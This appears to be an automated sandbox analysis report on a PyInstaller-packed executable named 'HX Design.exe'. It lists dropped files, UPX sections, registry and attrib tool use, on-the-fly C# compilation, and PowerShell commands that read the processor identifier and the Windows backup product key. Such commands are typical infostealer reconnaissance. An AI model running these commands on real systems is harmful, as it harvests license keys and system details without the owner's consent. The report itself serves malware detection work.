Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671427459.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672181668.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672711559.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672006597.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669381520.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: HX Design.exe, 00000001.00000002.2112292200.00007FFE13301000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669582469.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: HX Design.exe, 00000001.00000002.2108765974.00007FFE01424000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: HX Design.exe, 00000001.00000002.2111882351.00007FFE13201000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672181668.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672894743.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: HX Design.exe, 00000001.00000002.2104253662.00007FFDFAD87000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: HX Design.exe, 00000001.00000002.2104758778.00007FFDFB1EA000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: HX Design.exe, 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671060451.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669865054.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669381520.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672094828.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: HX Design.exe, HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672623593.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: HX Design.exe, HX Design.exe, 00000001.00000002.2104758778.00007FFDFB1EA000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.pdb source: powershell.exe, 00000028.00000002.1879970672.000001D183AA6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670262264.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000049.00000002.1967359399.00007FF77D260000.00000002.00000001.01000000.00000024.sdmp, rar.exe, 00000049.00000000.1955536544.00007FF77D260000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672530678.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1673205368.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671919991.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671253398.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: HX Design.exe, 00000000.00000003.1669963061.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: HX Design.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: HX Design.exe, 00000001.00000002.2110062071.00007FFE1025B000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670376660.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: HX Design.exe, 00000001.00000002.2111353721.00007FFE12E11000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670667043.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672807365.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: HX Design.exe, 00000000.00000003.1670955519.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: HX Design.exe, 00000001.00000002.2109756879.00007FFE0EB41000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672094828.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp

Source: HX Design.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: HX Design.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: HX Design.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: HX Design.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: HX Design.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: api-ms-win-core-console-l1-1-0.dll.0.dr

Static PE information: 0x74DC4D47 [Tue Feb 17 01:39:19 2032 UTC]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline"

Source: C:\Users\user\Desktop\HX Design.exe

Code function: 1_2_00007FFDFAD90350 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

1_2_00007FFDFAD90350

Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: libffi-8.dll.0.dr	Static PE information: section name: UPX2

Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFACEAC25 push rcx; ret	1_2_00007FFDFACEAC62
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB3227AE push rsp; iretd	1_2_00007FFDFB3227B9
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB32267D push rbx; retf	1_2_00007FFDFB322685
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE00334331 push rcx; ret	1_2_00007FFE00334332
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9A2DD2A5 pushad ; iretd	8_2_00007FFD9A2DD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9A3F85FB push ebx; ret	8_2_00007FFD9A3F860A

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\HX Design.exe

Process created: "C:\Users\user\Desktop\HX Design.exe"

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\libffi-8.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\python313.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-fibers-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\HX Design.exe

Code function: 0_2_00007FF732065830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

0_2_00007FF732065830

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
